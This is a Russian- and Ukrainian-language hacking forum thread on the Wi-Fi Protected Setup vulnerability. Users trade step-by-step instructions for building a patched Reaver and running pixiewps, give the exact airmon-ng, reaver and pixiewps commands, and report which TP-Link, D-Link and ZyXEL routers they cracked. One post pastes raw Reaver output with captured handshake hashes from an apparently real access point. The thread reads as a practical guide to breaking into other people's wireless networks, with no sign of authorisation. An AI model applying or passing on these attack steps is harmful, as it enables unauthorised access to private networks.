Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    так я так и делал,говорю ж,всё как на видео сделал....но на видио,при запуске ривера он не перебирал как обычно,а сразу выдавал информацию о точке,прошивка,хешы какие то,а дальше подставлялись эти хеши и запускался pixiewps,а у меня просто ривер работает и всё,перебирает как обычно пины,а я то хочу запустить pixiewps...
     
  2. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Tp-Link, Dlink, Asus перепробовал и Pin not found. Если Reaver не остановить, то, правильно, он будет продолжать перебор. Просто надо проследить вначале перебора-если появились необходимые данные - ривер нодо остановить и далее по инструкции. Мне ничего из перечисленных роутеров взломать не удалось (Pin not found).
     
  3. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    у меня не появляются необходимые данные,т.е у меня просто тупо ривер пины перебирает(1,2,3,4 пина и тд)Т.е вот как на видео,так у меня не происходит,после перебора первого же пина,данные о точке появится должны,а у меня просто ривер пин за пином перебирает....так что что то у меня не работает,хотя всё устанавливал по инструкции,никаких ошибок не выскакивало...
    Та и вообще,я так понимаю,из 50 точек,хоть бы одна так открывалась)))судя по отзывам,неговоря,если на точке вообще wps залочен,а на TP-LINK как правило как залочилось,так до перезагрузки...
     
  4. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Сначала необходимо подключиться к интернету и по очереди ввести sudo apt-get install libpcap-dev
    sudo apt-get install libsqlite3-dev, как сказано в посте 2410, потом отключиться от интернета и далее по видео, внимательно проследить и вовремя остановить перебор. Удачи.
     
  5. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,763
    Likes Received:
    18,132
    Reputations:
    377
    Значит ты не пропатчил как надо reaver, патченый он должен показывать версию reaver 1.5. Выложи скрин с работой reaver и комманду которой reaver запускаешь.
     
    _________________________
  6. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Поддерживаю, у меня тоже такое было, когда плохо пропатчил.
     
  7. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    так так и делал,ну правда от инета не отключался...а так всё как по видео,т.е последовательно...
     
  8. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    правильно,1.5 показывает,значит пропатчил.....ну выложу скрин,как запущу всё это...
     
  9. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    тогда подробно,пошагово напиши,как пропатчил,та и вообще как всё устанавливал,т.е сначала те 2 файла,потом ривер,потом pixiewps?Спасибо заранее))
     
  10. pwr2

    pwr2 Member

    Joined:
    1 Oct 2013
    Messages:
    182
    Likes Received:
    49
    Reputations:
    6
    Аналогично. На тех, что у нас более менее распространены уязвимость не работает. Кто какие модели роутеров взломал?
     
  11. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    1. скопіювати в папку HOME папки pixiewps-master і reaver-wps-fork-read-only

    2. підключитися до інтернету і в терміналі по черзі запустити:

    apt-get install libpcap-dev
    apt-get install libsqlite3-dev
    і від'єднатися від інтернету


    3. chmod 755 (пробіл) з відкритої папки reaver-wps-fork-read-only - src перетягнути файлик - CONFIGURE

    4. cd (пробіл) і перетягнути папку - SRC

    5. ./configure

    6. make

    7. make install і закрити термінал

    Новий термінал

    8. cd (пробіл) і перетягнути папку SRC з папки pixiewps-master

    9. make

    10. make install і закрити термінал

    новий термінал

    11. iwconfig - airmon-ng start wlan0 - airodump-ng mon0

    12. reaver -i mon0 -c ? -b xxxxxx -vv -S і зупинити, коли будуть всі дані

    13. pixiewps -e PKE -s Hash1 -z Hash2 -a Auth Key -S
     
    #2411 vedemur, 8 Apr 2015
    Last edited: 8 Apr 2015
    4Fun, pwr2 and Payer like this.
  12. dxx258

    dxx258 New Member

    Joined:
    19 Jun 2012
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    1.
    sudo apt-get install libssl-dev
    sudo apt-get install libpcap-dev
    sudo apt-get install libsqlite3-dev
    cd reaver-wps-fork-read-only/src
    chmod 775 configure
    ./configure
    make
    make install
    2.
    pixiewps-master/src
    make
    make install

    " chmod 775 " я вводил это
     
    Payer likes this.
  13. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    А это--sudo apt-get install libssl-dev-- откуда? В видео нет.
     
  14. dxx258

    dxx258 New Member

    Joined:
    19 Jun 2012
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    из видео в описании
     
  15. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Интересно, не нахожу, но учту, спасибо.
     
  16. ivann

    ivann Member

    Joined:
    9 Mar 2014
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    Всё верно, дело в моде reaver-ра и от сюда зависет работает иль нет, tp-link, из 8-ми, только один сдался,причём у которых lock wps (блок на 60 сек)-антон, dlink-ки из 5-ти два, к стати если чуть обождать перебор дольше, то суммы другие даёт и вот с ними dlink дал пин, остальные Pin not found, ZyXEL Keenetic два штуки 2-3 секунды и отдал pin.
    Кто поглубже знает Линь, подскажите, как вернуть назад режим мониторинга, после патча на reaver сменилось обозначение wifi, было wlan1, а стало wlan1mon (думаю что мод, драйвер меняет), так из-за этого режим мониторинга не влючается на bully и Inflator.
     
  17. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    так а какой должен быть мод reaver-ра по правильному,что бы работал правильно?
     
  18. ivann

    ivann Member

    Joined:
    9 Mar 2014
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    СЕРЖ32, у tp-link, которые на 60 сек, однозначно, wps отключен.(поэтому хоть минуту, час или перезагрузка роута ни чо не даёт)
    reaver тот что по ссыле скачивания, а порядок его установки, более подробно, уже выше написали ((первый раз при запуске у меня тож перепор по порядку шёл)), я Kali, сейчас не пользую, поэтому пункты sudo apt-get install libssl-dev.....и т.д. не делаю.
     
  19. -bI-

    -bI- Member

    Joined:
    25 Aug 2012
    Messages:
    103
    Likes Received:
    11
    Reputations:
    0

    Когда запускаешь airmon-zc получается wlan1mon, когда airmon-ng mon0, у меня с airmon-zc нет -1 при фиксированном канале, но пропадает wlanx, до airmon-zc stop wlanx.
     
  20. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    ну вот,вот какие хешы выбирать?
    Reaver v1.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

    [+] Switching mon0 to channel 6
    [+] Waiting for beacon from A0:F3:C1:44:A7:4A
    [+] Associated with A0:F3:C1:44:A7:4A (ESSID: Piramida)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: f7:87:9b:b3:a9:8b:2a:0d:2d:99:b4:e4:ca:77:72:d5
    [P] PKE: 75:6e:e5:08:f0:a5:a5:29:be:57:6b:c3:96:4c:8f:96:0f:97:c9:0c:76:19:8d:f0:92:44:52:30:b8:e5:1d:0e:30:2b:eb:42:28:5f:85:74:64:36:25:c5:02:12:13:a5:91:76:9f:ce:54:ea:0a:e2:24:2a:f1:81:89:6d:ed:a3:c1:a7:7e:bc:ae:92:48:79:1e:7f:99:c9:50:77:89:92:65:04:f9:1a:c3:9d:6d:42:9f:65:2b:2e:13:04:a9:83:0d:0f:a2:35:db:34:c4:81:74:3d:9c:5b:06:c4:bf:73:ee:9b:c7:5a:f4:8a:4d:6b:bd:c9:50:91:0f:61:56:53:1a:ad:59:c5:30:bd:19:b6:6f:ba:1a:22:ef:20:db:08:fc:5b:1c:5e:e4:d3:1f:c5:84:54:87:07:ed:c1:84:74:ae:31:dd:cd:35:64:aa:42:43:c7:61:79:8b:bb:c8:3b:50:3f:d9:08:86:d2:95:db:2a:12:49:c3:6a:fe:e2:f7
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [+] Received M1 message
    [P] AuthKey: 40:11:dd:34:20:c1:a8:4e:95:5c:f9:18:e8:46:03:dd:96:30:5f:55:8c:e2:c3:c8:23:a0:07:ea:09:42:56:b0
    [+] Sending M2 message
    [P] E-Hash1: 44:5e:8a:80:54:d2:5f:c9:4d:c9:4d:c2:16:35:2a:9a:34:c1:94:3e:94:4e:a2:aa:2a:af:ba:11:b8:d5:a6:5e
    [P] E-Hash2: 7f:c7:a5:23:8a:9e:c0:ba:70:14:49:97:63:27:36:58:65:2e:99:43:44:d1:c6:86:b6:01:aa:66:57:78:44:7e
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 1
    [+] Pin count advanced: 1. Max pin attempts: 11000
    C[+] Trying pin 00005678.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: da:35:7b:33:f5:1d:57:82:38:19:42:24:b6:1b:26:5b
    [P] PKE: 44:4c:72:cb:2e:10:6a:5b:6a:4b:d4:5a:d9:24:2e:19:87:63:d5:6a:8a:ae:56:66:52:45:79:22:85:65:27:5b:88:4f:1b:7a:5e:7f:06:a8:23:a6:57:eb:f7:47:96:b2:8d:47:93:1b:17:a2:8e:df:8e:d5:42:41:69:78:9a:b6:90:0e:3a:3f:74:2a:ed:d3:e7:36:05:22:75:0d:c2:75:ef:e9:f9:3e:d9:0f:6c:67:90:00:f6:6a:cb:27:a9:75:c7:9d:e0:de:19:23:b3:ff:5d:78:ed:21:fd:e1:7e:52:de:00:76:65:44:c8:d8:0b:54:98:09:25:30:77:9c:cf:f1:43:df:19:83:85:ff:77:83:4f:fe:e5:a3:7b:ef:e1:7f:74:56:46:93:e2:b9:de:68:59:3b:46:11:b7:b0:b4:05:0d:08:07:a9:93:d7:ee:46:73:fc:dd:0e:33:c5:c0:27:55:88:8f:89:ad:26:4a:c9:aa:d8:ff:0b:59:04:2f
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [+] Received M1 message
    [P] AuthKey: 6c:05:6f:5e:c7:dc:74:94:b7:4e:b0:52:92:7d:93:cb:74:14:c6:55:bd:6c:05:dc:b4:71:91:7e:c2:aa:93:ba
    [+] Sending M2 message
    C[P] E-Hash1: 99:27:43:d0:9f:97:f8:f0:e1:da:d1:1f:47:11:c4:96:78:33:ae:7a:2e:13:19:9f:5b:eb:94:2f:87:27:0a:2c
    [P] E-Hash2: 98:e5:4e:48:d7:03:f0:ca:98:a3:f1:9a:38:b7:8f:68:63:20:2a:9a:84:b6:dd:32:51:56:d2:14:9b:33:fd:55
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 2
    [+] Pin count advanced: 2. Max pin attempts: 11000
    ^C
    [+] Session saved.